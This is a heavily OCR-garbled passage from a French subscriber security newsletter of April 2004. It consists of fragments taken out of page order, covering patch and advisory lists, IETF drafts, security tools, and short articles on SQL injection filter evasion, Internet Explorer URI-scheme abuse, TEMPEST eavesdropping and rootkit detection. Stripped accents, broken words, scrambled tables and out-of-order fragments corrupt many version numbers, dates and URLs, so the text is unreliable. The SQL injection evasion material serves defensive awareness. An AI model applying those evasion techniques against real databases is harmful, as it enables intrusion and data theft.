53. Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Disponibilit de nombreux correctifs Mandrake annonce la disponibilit des correctifs corrigeant les vuln rabilit s pr sentes dans les paquetages ethereal MDKSA 2004 024 9 1 9 2 squid MDKSA 2004 025 9 1 9 2 1 FW 8 2 CS 2 1 mplayer MDKSA 2004 026 9 2 1 ipsec MDKSA 2004 027 1 CVS MDKSA 2004 028 kernel MDKSA 2004 029 FW 8 2 tcpdump MDKSA 2004 030 FW 8 2 utmpter MDKSA 2004 031 2004 032 1 xine ui MDKSA 2004 033 22 1 MySQL MDKSA 2004 034 samba MDKSA 2004 035 xchat MDKSA 2004 036 211 kernel MDKSA 2004 037 2 10 0 FW 8 2 CS 2 1 http www linux mandrake com en security 1 5 1 1 1 1 1 1 FW 8 2 CS 2 1 2 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 2 2 2 2 2 2 2 2 2 LINUX REDHA RedHat annonce la disponibilit des correctifs corrigeant les vuln rabilit s pr sentes dans les paquetages squid RHSA 2004 134 01 9 0 mozilla RHSA 2004 110 01 AS ES W ES WS 3 ethereal RHSA 2004 136 01 AS ES W CVS RHSA 2004 154 01 cadaver RHSA 2004 158 01 mailman RHSA 2004 156 01 openoffice RHSA 2004 160 01 subversion RHSA 2004 159 01 kernel RHSA 2004 166 01 kernel RHSA 2004 105 01 kernel RHSA 2004 106 01 xfree86 RHSA 2004 152 01 kernel RHSA 2004 183 01 AS ES WS 3 Micro
54. GE Jj HANGE Exposition et manipulation de donn es sensibles Forte 05 04 interchange versions 85 5 0 x Sx A http www icdevgroup org pipermail interchange announce 2004 000044 html CAN 2004 0374 LI NUX Multiples vuln rabilit s dans Linux De multiples vuln rabilit s affectent le noyau Linux autorisant ainsi l acquisition de droits privil gi s l exposition d informations sensibles ou entrainant un d ni de service NH Debian Linux 3 0 woody SuSE Linux 8 0 9 0 Database Server eMail Server 111 3 1 Enterprise Server 7 8 Firewall on CD Admin host Connectivity Server Office Server Correctif existant Pilote DRI R128 D bordement de buffer Erreur de conception Fonction ncp lookup Pilote carte son Sound Blaster Syst me de fichier ISO9660 ext3 et J FS iDefense 101 http www idefense com application poi display id 101 amp type vulnerabilities amp flashstatus true DSA 481 1 http www debian org security 2004 dsa 482 CAN 2004 0003 CAN 2004 0010 CAN 2004 0109 CAN 2004 0177 CAN 2004 0178 CAN 2004 0181 Veille Technologique S curit N 69 Page 36 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 uetage ssmtp Deux vuln rabilit s dans le formatage de chaines de caract res affectent l agent de transport de courrier lectronique ssmtp
55. I O 6 Validation des tableaux de bord SSI O EXPLOITATI ON DES TABLEAUX DE BORD SSI 1 Miseen uvre des tableaux de bord SSI O 5 VOLUTION DES TABLEAUX DE BORD 551 __ p Suivi des tableaux de bord SSI 2 Suivi des modifications du contexte ou des objectifs On notera la relative importance de l tape initiale qui consiste inventorier prioritairement les besoins en mati re de suivi puis les objectifs assign s aux indicateurs dont on n oubliera pas de v rifier s ils peuvent tre constitu s partir des donn es sources disponibles L approche d velopp e dans le volet consacr la pr sentation de la m thodologie de d finition est remarquablement p dagogique Chaque tape y est pr sent e sous la forme d une fiche structur e comportant sept sections le libell et la r f rence de la t che les objectifs de la t che les acteurs de la t che les l ments en entr e les l ments en sortie la liste des t ches annexes li es la t che courante les explications et compl ments d information utiles Les concepts et interactions susceptibles de donner lieu interpr tation sont expliqu s par analogie avec un domaine tangible et concret celui du tableau de bord d un v hicule et de ses multiples indicateurs Le formalisme de cette pr sentation rend la m thodologie simple appr hender et doit par cons que
56. L Cette s quence aurait ainsi fort bien pu tre introduite la fin du param tre p1 de l exemple pr c dent pour liminer la partie finale de la clause portant sur le test du pr nom Une syntaxe alternative utilisant les s quences et reconnue par certains interpr teurs SQL permet d ins rer un commentaire au sein d une clause SQL Cette forme offre la possibilit d chapper certaines parties de la clause ou encore de modifier la syntaxe d une expression sans en changer l interpr tation Notre expression passe partout peut ainsi tre transform e en toujours dans l optique de leurrer un syst me d analyse Pour certains interpr teurs dont Oracle la s quence remplacera le caract re de s paration autorisant donc la construction d une expression telle que Au contraire pour d autres dont MySQL cette expression est purement ignor e et peut en cons quence tre positionn e au sein d un quelconque mot clef SQL permettant l utilisation d une clause telle que 3 Extensions et alt rations sp cifiques Les auteurs de l tude ont identifi nombre d extensions et d alt rations sp cifiques dont certaines proc dent d une combinaison des proc d s et astuces pr c dentes L interpr teur MS SQL offre ainsi la possibilit de coder la clause SQL sous la forme d une fonction prenant en argument une cha ne de caract res sous r serve que celle ci soit valide sur le plan de la syntaxe L expression SCIO DESEE U
57. R cemment finalis R Pour commentaire et relecture D En cours de d veloppement Compl ment d information http csrc nist gov publications nistpubs index html VERS ET VIRUS Description L UNIRAS Unified Incident Reporting amp Alert Scheme publie r guli rement diverses notes techniques destin es informer le public sur un sujet d actualit Fin mars l UNIRAS a publi une note technique tr s int ressante car portant sur l une des grandes nuisances de notre poque les codes malicieux au nombre desquels on comptera vers et virus En moins de 13 pages cette note technique r capitule tout ce qu il faut savoir sur le plan technique vis vis de ce type de menace et propose surtout un tableau synth tisant les risques associ s aux diff rents types de format de fichiers couramment rencontr s en environnement Windows Ces formats sont class s en trois cat gories allant du moindre risque au risque le plus lev La classification a t Veille Technologique S curit N 69 Page 17 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 effectu e en tenant compte des quatre facteurs de risque suivant 1 Format autorisant l ex cution directe de code compil ou interpr t 2 Format supportant l int gration d objets dont le format autorise l ex cution de code 3 Format conforme une norme inte
58. S RERO NE est ainsi parfaitement valide Publi e dans l optique de promouvoir le syst me d analyse et de protection dit par la soci t Imperva cette tude n en offre pas moins un excellent tat de l art des derniers proc d s employ s Compl ment d information http www imperva com download asp id 2 http www computerworld comy printthis 2004 0 4814 89545 00 html Interview Veille Technologique S curit N 69 Page 64 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE
59. T a repris sous la r f rence TA04 104A les avis Microsoft MS04 011 MS04 012 MS04 013 MS04 014 discutant de multiples vuln rabilit s dans Microsoft Windows Microsoft Outlook Express et Microsoft Jet Database Engine CAN 2003 0813 CAN 2004 0116 CAN 2003 0807 CAN 2004 0124 CAN 2004 0380 CAN 2003 0533 CAN 2003 0663 CAN 2003 0719 CAN 2003 0806 CAN 2003 0906 CAN 2003 0907 CAN 2003 0908 CAN 2003 0909 CAN 2003 0910 CAN 2004 0117 CAN 2004 0118 CAN 2004 0119 CAN 2004 0120 CAN 2004 0123 CAN 2004 0197 em l AC vii AS Ww Reprise de l avis Microsoft MS04 011 Le CIAC a repris sous la r f rence O 114 l avis Microsoft MS04 011 au sujet de quatorze vuln rabilit s affectant Microsoft Windows Plusieurs sont critiques et permettent d ex cuter un code arbitraire acqu rir des droits orivil gi s ou de provoquer un d ni de service distance CAN 2003 0533 CAN 2003 0663 CAN 2003 0719 CAN 2003 0806 CAN 2003 0906 CAN 2003 0907 CAN 2003 0908 CAN 2003 0909 CAN 2003 0910 CAN 2004 0117 CAN 2004 0118 CAN 2004 0119 CAN 2004 0120 CAN 2004 0123 Reprise de l avis Microsoft MS04 012 Le CIAC a repris sous la r f rence O 115 l avis Microsoft MS04 012 traitant de multiples vuln rabilit s dans les composants des services RPC et DCOM Une exploitation distante permet de provoquer un d ni de service d ex cuter un code arbitraire ou d ouvrir des ports de communication http ciac IInl gov ciac bulletins o 115 shtml
60. Yahoo Mail Yahoo Mail ne filtre pas correctement les messages et peut conduire l ex cution d un code arbitraire Forte 19 04 Yahoo Mail Correctif existant Mauvais filtrage des messages AD20040419 http www eeye com html Research Advisories AD20040419 html Vuln rabilit dans Yahoo Messenger x Une vuln rabilit affectant le client de messagerie instantan e Yahoo Messenger peut conduire l exposition d informations sensibles Moyenne 13 04 Yahoo Messenger version 5 6 Correctif existant Yahoo Messenger Non chiffrement du mot de passe Non utilisation du protocole HTTPS Rafel http lists netsys com pipermail full disclosure 2004 April 020053 html Veille Technologique S curit N 69 Page 45 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 AUTRES INFORMATIONS Les vuln rabilit s suivantes d j publi es ont t mises jour reprises par un autre organisme ou ont donn lieu la fourniture d un correctif Correctifs pour Mac OS X 10 2 8 et 10 3 3 Apple a annonc la disponibilit des correctifs pour Mac OS X Ils corrigent une vuln rabilit dans Cups en plus de celles corrig es par Security Update 2004 01 26 sur 10 2 8 et dans Cups libxml2 Mail et OpenSSL sur 10 3 3 http www apple com support downloads securityupdate 2004 04 05 10 2 8 html h
61. adresses IP rel vent de la responsabilit d une soci t priv e plac e sous le contr le plus ou moins direct d une soci t de droit priv am ricain but non lucratif dont le si ge se trouve San Diego en Californie l ICANN Internet Corporation for Assigned Names and Numbers C est la raison pour laquelle la gouvernance de l Internet est bien souvent associ e la gestion centralis e des ressources communes que sont les noms de domaines les adresses IP et les param tres du protocole Un article fort int ressant de Pascal Fortin et intitul Gouvernance de l Internet Quelle l gitimit pour l ICANN claire la probl matique de la gouvernance de l Internet par une entreprise dont on peut l gitimement remettre en cause l ind pendance L affaire des redirections vers un serveur Verisign des requ tes http adress es vers des FQDN erron s est encore dans toutes les m moires Toujours est il que le sommet de Gen ve a r v l la ligne de fracture existant entre les diff rents acteurs de l Internet quant la nature politique devant tre attach e cette gouvernance La plupart des institutionnels r clament une gestion intergouvernementale des ressources communes de l Internet cette position n est pas partag e par les Etats Unis La France y est favorable avec une mise sous tutelle de L ONU de l ICANN Les repr sentants de la soci t civile h sitent entre une gestion intergouvernementale et une gestio
62. aisis sans oar l assistant First Time Use Wizard ne sont pas correctement chiffr s Moyenne 05 04 Citrix MetaFrame Password Manager 2 0 Correctif existant Password Manager Non chiffrement du mot de passe Citrix CTX103662 http support citrix com kb entry jspa entryl D24063 amp categoryI D2254 Cr ation crasement distants de fichiers sensibles Forte 14 04 CVS version 1 11 14 et inf rieures yS Utilisation de chemins absolus dans les fichiers diff RHSA 04 154 01 http www linuxsecurity com advisories redhat advisory 4222 html CAN 2004 0180 El vation de privil ges dans F Secure BackWeb Une vuln rabilit dans F Secure BackWeb autorise un utilisateur local obtenir les droits du compte SYSTEM Forte 06 04 F BackWeb V6 31 et inf rieures Anti Virus for File Servers for Workstations 5 x Policy Manager 5 x Correctif existant Module BackWeb client Non disponible http support f secure com enu corporate downloads hotfixes pm hotfixes shtml http support f secure com enu home downloads hotfixes av5 hotfixes shtml Vuln rabilit dans FreeBSD Une vuln rabilit dans la gestion des sockets IPv6 de FreeBSD peut permettre un utilisateur local d obtenir des informations contenues dans le noyau et mener un d ni de service Forte 29 03 FreeBSD version 5 2 Correctif existant Fonction setsockopt Erreur de conception SA 04 06 ipv6 ftp ftp
63. aller un module dans le noyau Encore faut il avoir la garantie que le code charg d assurer ces contr les ait la pleine visibilit de toutes les ressources du syst me c est dire que les fonctions auxquelles il fera appel n aient pas t pr alablement alt r es ou intercept es par un rootkit Dans sa conf rence intitul e Advanced windows 2000 rootkits detection J Rutkowski argumentait en faveur d une approche prioritairement ax e sur la validation de l int grit des structures et objets critiques du syst me en comparant celles ci un mod le de r f rence obtenu par une analyse statistique effectu e sur un syst me dont on a la garantie qu il est sain L analyse sera plus particuli rement port e sur les structures et objets ayant trait au syst me de fichiers la base de registre et aux structures sp cifiques du noyau charg es de maintenir le contexte des processus et des t ches charg es en m moire La viabilit de cette approche pouvait tre test e par le biais d un d monstrateur prenant la forme d un utilitaire d nomm PatchFinder livr avec ses sources Derni rement cet utilitaire a fait l objet d une refonte cons quente dans l optique de fournir aux administrateurs et exploitants un outil fiable et performant s installant sous la forme d un service sur les syst mes BIS gen Cette nouvelle version de PatchFinder devient ainsi l environnement Windows ce qu tait d j l utilitaire ChkRo
64. ant Gestionnaire des partages D bordement de buffer Microsoft 322857 http support microsoft com default aspx scid kb en us 322857 Full Disclosure http 115 5 netsys com pipermail full disclosure 2004 April 020524 html Cross Site Scripting sur SharePoint Portal Server Microsoft SharePoint Portal Server est sensible des attaques par Cross Site Scripting Forte 05 04 Microsoft SharePoint Portal Server 2001 Microsoft 837017 http support microsoft com kbid 837017 CAN 2004 0379 Vuln rabilit dans Microsoft J et Database En Forte 13 04 Microsoft Jet Database Engine version a0 O O C C CAN 2004 0197 Impression automatique via Internet Explorer Une m thode appel e depuis une page web permet d imprimer automatiquement un document via Internet Explorer Moyenne 12 04 Microsoft Internet Explorer toutes versions Palliatif propos M thode ExecWB Impression automatique de documents Bugtraq 360128 http www securityfocus com archive 1 360128 orobl mes de permissions dans le d bogueur autorisent tout utilisateur d boguer du code Javascript Faible 23 03 Microsoft Visual Studio toutes versions Office XP SP3 et inf rieures _ M 9I Cr ation non s curis e de fichiers temp Des fichiers temporaires sont cr s de fa on non s curis e autorisant un utilisateur craser des fichiers de son choix sur le syst me Forte 14 04 MYSQL 3 23 58
65. appel e dans la barre d tat L activation du lien conduit sur un site tiers dont l URL est en r alit associ e au bouton SUBMIT pr sent dans le formulaire mais astucieusement masqu par l utilisation d un style appropri E Microsoft Internet Explorer hr site fr index html http site html E ka Poste de travail Le texte du lien devra ainsi obligatoirement prendre la forme d une URL et sa couleur doit tre explicitement cod e Le second cas est un exemple typique du probl me pos par la multitude de protocoles gravitant autour du concept d uniformisation de l acc s aux ressources Alli au premier il permet la mise en uvre d une attaque efficace Veille Technologique S curit N 69 APOGEE Communications Tous droits r serv s Le terme URI Uniform Ressource Identifier d signe un proc d permettant d identifier une quelconque ressource accessible sur un r seau en fournissant toutes les donn es requises La forme de base d un tel identifiant est constitu e de deux sections La premi re est d nomm e schema ou encore protocole La structure exacte de la seconde section d pend du sch ma d identification ou protocole d acc s retenu scheme lt scheme specific parts gt Forme l mentaire scheme authority path query URI g n rique Les formes les plus classiques sont celles couramment utilis es par l interm d
66. arit dans la version pr c dente Les parties prenantes doivent adopter une approche globale de la gestion de la s curit Principe conserv de la version pr c dente Les parties prenantes doivent examiner et r valuer la s curit des syst mes et r seaux d information et introduire les modifications appropri es dans leurs politiques pratiques mesures et proc dures de s curit Ces principes permettent de f d rer un r f rentiel structur d taillant quelques 160 principes de s curit dont il est recommand qu ils soient trait s dans la politique de s curit D finis en conformit avec les normes 180 13335 Guidelines for the management of IT Security 19590 15408 Evaluation criteria for IT security et 150 17799 Code of Practice for Information Security Management ces principes de s curit sont organis s dans 16 cat gories elles m mes regroup es en trois classes Principes organisationnels PSI Politique de s curit 12 principes Veille Technologique S curit N 69 Page 13 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Apogi ORG Organisation de la s curit 17 principes GER Gestion des risques 12 principes CDV S curit et Cycle de vie 6 principes ACR Assurance et certification 14 principes ASH Aspects humains 10 principes PSS Planification de la continuit des
67. as 01 15 04 Virtual Broadband Access Server Protocol for communicating draft ietf idr bgp4 mib 14 23 04 Definitions of Managed Objects for BGP 4 Veille Technologique S curit N 69 Page 25 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 draft chavali bgp prefixlimit 01 12 04 Peer Prefix Limits Exchange in BGP DHCP draft ietf dhc rapid commit opt 02 draft ietf dhc reclassify options 01 draft 0 DNS To NETS nada required 05 ns Requiring DNS IN ADDR Mapping draft pale email 01 draft hutzler spamops 00 ICAR graft alvestrand icar xarea 00 draft allman icar wg revcomm 00 IDN draft bartosiewicz idn pltid 0 7 13 04 Registering Internationalized Domain Names under PL MAP draft ietf imapext annotate 09 draft ietf imapext list extensions 05 draft daboo imap annotatemore 05 draft crispin imap urlauth 07 MG draft ietf mmusic img req 04 draft ietf mmusic img framework 04 IP ldraft shirasaki dualstack service 04 127 04 A Model of IPv6 IPv4 Dual Stack Internet Access Service draft ietf iptel rfc2806bis 07 draft ietf iptel tel np 02 S Gaei draft ietf mip4 rfc3012bis 01 draft ietf mip4 dynamic assignment 01 draft ietf mip6 mipext advapi 01 27 04 Extension to Sockets API for Mobile I Pv6 IRIS The Core Protocol draft ietf crisp iris core 06 16 04 IIRIS The Core
68. ase de registre Dans ce mod le l application connue sous l appellation Internet Explorer n est d ailleurs plus qu un simple container charg d activer un ensemble de composants impl mentant toutes les fonctions requises et r utilisables par quiconque dispose des sp cifications des interfaces La mise en uvre des gestionnaires de sch mas peut amener une r duction du niveau de s curit dans l hypoth se o ceux ci respecteraient pas le mod le de s curit r glementant la gestion des zones de s curit ainsi que la sauvegarde et l ex cution des applets ou autres composants Tout l art des bidouilleurs et chasseurs de vuln rabilit s consiste d sormais rechercher les fonctionnalit s permettant de contourner ces restrictions dans les composants et gestionnaires susceptibles d tre activ s par le biais d une URL construite sur mesure Comportement s curitaire Plusieurs protocoles sont plus particuli rement dans la ligne de mire de ces chercheurs d un nouveau genre dont les protocoles mk its et ms its La derni re attaque en date tire ainsi parti des fonctionnalit s propos es par les protocoles tmhtml et ms its Des bidouilleurs de g nie ont ainsi mis en vidence de multiples probl mes dans la logique de traitement des diff rents gestionnaires mais aussi dans la logique d enchainement de ceux ci Rappelons que chaque gestionnaire analyse la partie sp cifique de l URI qui lui es
69. bilit des correctifs pour vim sur OpenLinux 3 1 1 Server et Workstation Une vuln rabilit peut autoriser un utilisateur ex cuter des commandes arbitraires via un fichier texte malicieux Correctifs pour util linux SCO a annonc la disponibilit des correctifs pour util linux sur OpenLinux 3 1 1 Server et Workstation Ils corrigent une vuln rabilit pouvant entra ner l exposition d informations sensibles ftp ftp sco com pub security OpenLinux CSSA 2004 016 0 txt CAN 2004 0080 Correctif pour Perl SCO a annonc la disponibilit d un correctif pour Perl pour SCO Unixware versions 7 1 1 et 7 1 3 et Open UNIX 8 0 0 corrigeant ainsi une vuln rabilit dans le module Safe ftp ftp sco com pub updates UnixWare SCOSA 2004 1 SCOSA 2004 1 txt CAN 2002 1323 Correctif OpenSSL pour Sidewinder Firewall Secure Computing a annonc la disponibilit d un correctif pour Sidewinder Firewall 5 2 corrigeant ainsi de multiples failles dans OpenSSL pouvant conduire un d ni de service http www securecomputing com pdf 52110RelNotes pdf CAN 2004 0079 CAN 2004 0081 CAN 2004 0112 Correctifs pour mutt Sun a annonc la disponibilit des correctifs pour mutt pour les plate formes Sun Cobalt Qube 3 RaQ 4 et RaQ XTR Ils corrigent un d bordement de buffer pouvant entra ner un d ni de service dans l application et une possible ex cution de code arbitraire http sunsolve sun com pub cgi show p
70. bjet du document 1 LES CRIT RES COMMUNS POUR L VALUATION DE LA S CURIT DES TECHNOLOGIES DE L INFORMATION 2 LES LIGNES DI RECTRI CES DE L OCDE 2 1 Lignes directrices r gissant la s curit des syst mes et r seaux d information 2 2 Lignes directrices r gissant la politique de cryptographie 3 CODES D THI QUE DES M TIERS DES TECHNOLOGIES DE L INFORMATI ON Veille Technologique S curit N 69 Page 14 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 3 1 Codes d thiques nationaux 3 2 Autres codes d thique dans le monde 4 LES ATTEI NTES AUX PERSONNES 4 1 La protection de la vie priv e 4 2 La protection du secret professionnel 4 3 La protection du secret de la correspondance 4 4 La protection des donn es nominatives 5 LES ATTEI NTES AUX BI ENS 5 1 Le vol 5 2 L escroquerie 5 3 Les d tournements 5 4 Les destructions d gradations et d t riorations 5 5 Les atteintes aux syst mes d informations 6 LES ATTEI NTES AUX INT R TS FONDAMENTAUX DE LA NATI ON TERRORISME 1 L intelligence avec une puissance trang re 2 La livraison d informations une puissance trang re 3 Le sabotage 4 Les atteintes au secret de la d fense nationale 5 Le terrorisme atteintes aux syst mes de traitement automatis de donn es 6 Faux et usages de faux S ATTEI NTES LA PROPRI T INTELLECTUELLE 1 La protection du droit d auteur 7
71. ce et l ex cution de code arbitraire http www ciac org ciac bulletins o 106 shtml CAN 2004 0191 CAN 2003 0594 CAN 2003 0564 Reprise de l avis Apache Le CIAC a repris sous la r f rence O 128 l annonce Apache sur la disponibilit de la version 2 0 49 corrigeant trois vuln rabilit s dont un d ni de service http www ciac org ciac bulletins o 128 shtml CAN 2004 0174 CAN 2003 0020 CAN 2004 0113 Reprise de l avis Debian DSA 472 1 Le CIAC a repris sous la r f rence O 107 l avis Debian DSA 472 1 au sujet de plusieurs d bordements de buffer affectant vfte une version de l diteur fte fonctionnant en mode console http www ciac org ciac bulletins o 107 shtml Reprise de l avis Debian DSA 474 1 Le CIAC a repris sous la r f rence O 108 l avis Debian DSA 474 1 au sujet d une vuln rabilit permettant de contourner les r gles de la liste de contr le d acc s ACLs http www ciac org ciac bulletins o 108 shtml CAN 2004 0189 Reprise de l avis Cisco 50400 Le CIAC a repris sous la r f rence O 111 l avis Cisco 50400 au sujet d une faille dans les dispositifs WLSE et HSE Un compte cod en dur existe est permet d acc der aux dispositifs http www ciac org ciac bulletins o 111 shtml Reprise de l avis Debian DSA 476 1 Le CIAC a repris sous la r f rence O 109 l avis Debian DSA 476 1 au sujet d une vuln rabilit dans Heimdal Kerberos Une erreur de validation dans les requ tes
72. cercle fr http www le cercle fr script p1 v1 p2 v2 l utilisateur Dans une telle infrastructu re les NAVI GATEUR INTERNET Serveur WEB Serveur SGBD donn es saisies par l utilisateur EMT constituent un v hicule id al Domaine de visibilit d une variable accessible par l utilisateur car autorisant un transfert direct d informations entre le monde ext rieur et l interface d acc s la base de donn es La technique d nomm e SQL I njection consiste donc renseigner les variables contenant les donn es param tr es d un quelconque formulaire avec des portions de clauses SQL dans l optique d obtenir la g n ration par le script associ au formulaire d une requ te modifi e mais cependant toujours valide Ainsi et titre d exemple la requ te SQL param tr e et pr sent e ci contre pourra donner lieu un r sultat totalement inattendu si les param tres externes ne font E l objet d aucun contr le de validit Ainsi normalement concue pour retourner les r f rences d un utilisateur dont le nom Item Name et le code Item Code sont connus cette requ te peut tre d tourn e pour obtenir toutes les r f rences contenues dans la table Users Dans un environnement s curis l assemblage de la requ te doit provoquer une erreur voire m me une alerte de s curit de la part du processus charg de l assemblage L adage trop d
73. cible syst me d exploitation et du lieu d ex cution serveur ou poste client id alement en fournissant deux tableaux l un r capitulant les risques associ s aux formats identifi s par l extension r put e normalis e l autre sp cifiant le traitement normalement associ aux extensions connues Force est de reconna tre qu une telle classification requerrait un travail de fond cons quent et susceptible d tre remis en question par chaque nouvelle version du syst me d exploitation ou des applications Rappelons ce propos que si l extension attach e au nom d un fichier ne repr sente qu une convention et ne garantit pas que le contenu de ce fichier respecte le format associ cette extension dans bien des cas le syst me d exploitation utilisera celle ci pour s lectionner l application charg e de traiter le fichier En environnement Windows bien rares sont les cas pour lesquels la s lection de l application s appuie sur la pr sence d une signature le magic number de l environnement UNIX dans le contenu C est alors la porte ouverte aux probl mes de s curit que l on connait et qui ne pourront tre solutionn s par l utilisation d un filtrage bas soit sur le seul contenu soit sur la seule extension Si la premi re solution est ais e la seconde l est moins puisqu il s agirait d identifier sans ambiguit le format d un quelconque fichier partir de son seul contenu Ce probl me n est pas r cent puisque d s 1985
74. depuis un navigateur sans pour about n autant que cette activation se E traduise final la seule 5 Le ei winoni o e ip d SE edu urimon di m o ences Mu cese ee eme iee mes L ti NES itssdi synoptique ci contre pr sente e B i javascript mshtml dil une partie des sch mas et de zer n urimondil l enchailnement des traitements r ELE associ s effectu s sur une URI inato jo mena Client mail en environnement Microsoft Hmm M mens EE La portion de l URI correspondant Ec non au sch ma permet de d terminer itssdi lt 5 o Rt Q le gestionnaire adhoc les donn es sp cifiques tant ensuite trait es par celui ci Certains sch mas sont bien connus http https ftp file gopher mailto certains ne le sont qu la suite d incidents de s curit about mk ipp d autres enfin ipp ms its ne sont jamais rencontr s sous la forme d une URL c est dire d une URI directement exploitable par un navigateur et n cessiteront de recourir un script balise lt SCRIPT gt ou d tre activ s par une r f rence sur un objet balise lt OBJECT gt On notera que le mod le utilis par Microsoft peut ais ment tre tendu toutes les informations concernant les sch mas g r s tant configur es dans la b
75. des correctifs PHCO 30407 et PHNE 30168 pour HP UX B 11 04 Ils corrigent un d bordement de buffer dans la fonction xdrmem getbytes http www4A itrc hp com service cki docDisplay do docl d HPSBUX0303 252 R vision du bulletin HP HPSBUXO207 202 HP a r vis son bulletin HPSBUX0207 202 afin d annoncer la disponibilit du correctif BIND 920 B 11 11 pour HP UX B 11 11 corrigeant ainsi un d ni de service dans BIND version 9 http www4 itrc hp com service cki docDisplay do docl d HPSBUX0207 202 Recommandations sur la vuln rabilit J etadmin HP a publi sous la r f rence HPSBP101007 un bulletin d information au sujet de la vuln rabilit affectant HP Web Jetadmin 7 5 Un utilisateur distant peut provoquer un d ni de service ou obtenir un acc s non autoris via l interface web d administration HP recommande de positionner un mot de passe et de supprimer les r pertoires non utilis s http wwwd4A itrc hp com service cki docDisplay do docl d HPSBPI 01007 Correctif pour OpenSSL HP a annonc la disponibilit d un correctif OpenSSL pour le serveur HP UX AAA fonctionnant les plate formes HP B 11 00 B 11 11 et B 11 23 Il corrige ainsi de multiples failles dans OpenSSL pouvant conduire un d ni de service http wwwd4 itrc hp com service cki docDisplay do docl d HPSBUX01011 CAN 2004 0079 CAN 2004 0081 CAN 2004 0112 Correctifs pour XFree86 HP a annonc la disponibilit des correctifs pour XFr
76. domness Requirements for Security DHCP draft ietf dhc agentopt radius 06 draft ietf dhc v4 threat analysis 01 DHCPv4 Threat Analysis raft baba dnsext acl reqts 02 103 raft popov cryptopro cpalgs 01 raft zegman ike hybrid auth 01 A Hybrid Authentication Mode for IKE raft siemborski imap sasl initial response 03 13 04 Extension for SASL Initial Client Response O IN IN IN lt OJO WIR IR O Q UJ nan OST N UJ o O MAP Q JERBE olamrmenm mo uo T draft jones opsec 06 23 04 Operational Security Requirements for IP Network Infrastructure IPSEC graft ietf psec kev2 algorithms 05 21 04 Cryptographic Algorithms for use in the IKE Version 2 draft ietf ipsec ui suites 06 14 04 Cryptographic Suites for IPsec KRB draft ietf cat kerberos pk init 19 N N lt O Q raft raeburn krb rijndael krb 06 MAP KIX FC1734 FC2554 draft puig rpsec generic requirements 02 0 0 draft ietf rpsec routing threats 06 SASL draft ietf sasl saslprep 08 2 AES Encryption for Kerberos 5 MAP Discussion and Applicability Statement X 509 Operational Protocols Certificate Store Access via HTTP Microsoft EAP CHAP Extensions POP3 SASL Authentication Mechanism SMTP Service Extension for Authentication Security Requirements for Routing Protocols Generic Threats to Routing Protocols S ASLprep Stringprep profile for user names and passwords
77. duit r duire consid rablement le taux de la pollution radio lectrique mais encore insuffisamment Veille Technologique S curit N 69 Page 9 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 pour viter que brouiller un r cepteur plac quelques centim tres d un cran ou d une unit centrale Pour s en convaincre une exp rience simple peut tre r alis e en approchant d un cran travaillant en haute mE V WW alind dili dms 17755 r solution un r cepteur cal aux environs de la station amp France Inter grandes ondes 162Khz et ouvrant T refermant des fen tres Windows On d couvre alors que le bruit de fond audible change avec le contenu de l cran Imaginons maintenant pouvoir extraire ces signaux principalement g n r s par le codage de l image pixel par pixel ligne par ligne pour les r injecter sur un second NIZ cran quitte r g n rer localement les signaux de synchronisation Nous obtiendrions alors une copie de 5 Acquisition l image affich e sur l cran principal image dont la qualit d pendra principalement de l exactitude de la copie des M R g n ration signaux acquis On aura alors reproduit le proc d d voil en 1985 puis publiquement pr sent dans diverses conf rences sp cialis es en 1986 par Van Eyck un che
78. e code 1 1 25 05 03 http Iclint cs virginia edu Perl Scripting 584 22 04 04 http www cpan org src index html 3 6 15 04 04 http www php net downloads php WEB Dynamique E 5 0 2 25 04 04 7 O ANALYSE R SEAU f T Dsniff Boite outls 2 3 17 12 00 http www monkey org dugsong dsniff Z Z EtterCap Analyse amp Modification 0 6 b 03 07 03 http ettercap sourceforge net index php s history Ethereal Analyse multiprotocole 0103 26 03 04 lhttp www ethereal com O Nstreams cpDump Analyse multiprotocole 33 8 3 ibpcap Acquisition Trame 0 8 3 cpFlow 21 cpShow 81 Veille Technologique S curit N 69 Page 22 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Apogi WinPCap 03 02 04 http winpcap polito it news htm ANALYSE DE J OURNAUX Analog journauxserveurhttp 15 32 23 03 03 fhttp www analog cx C fwLogWatch Analyse log L0O 0 25 04 04 fhttp cert uni stuttgart de projects fwlogwatch SnortSnarf Analyse Snort 021111 02 11 02 fhttp www silicondefense com software snortsnarf http www mrunix net webalizer download html ANALYSE DE S CURI T IF Boite outils 0 4a 14 05 03 lhttp sourceforge net projects biatchux ____ O Z o O O 7 11 2 26 04 04 http curl haxx se Nessus V
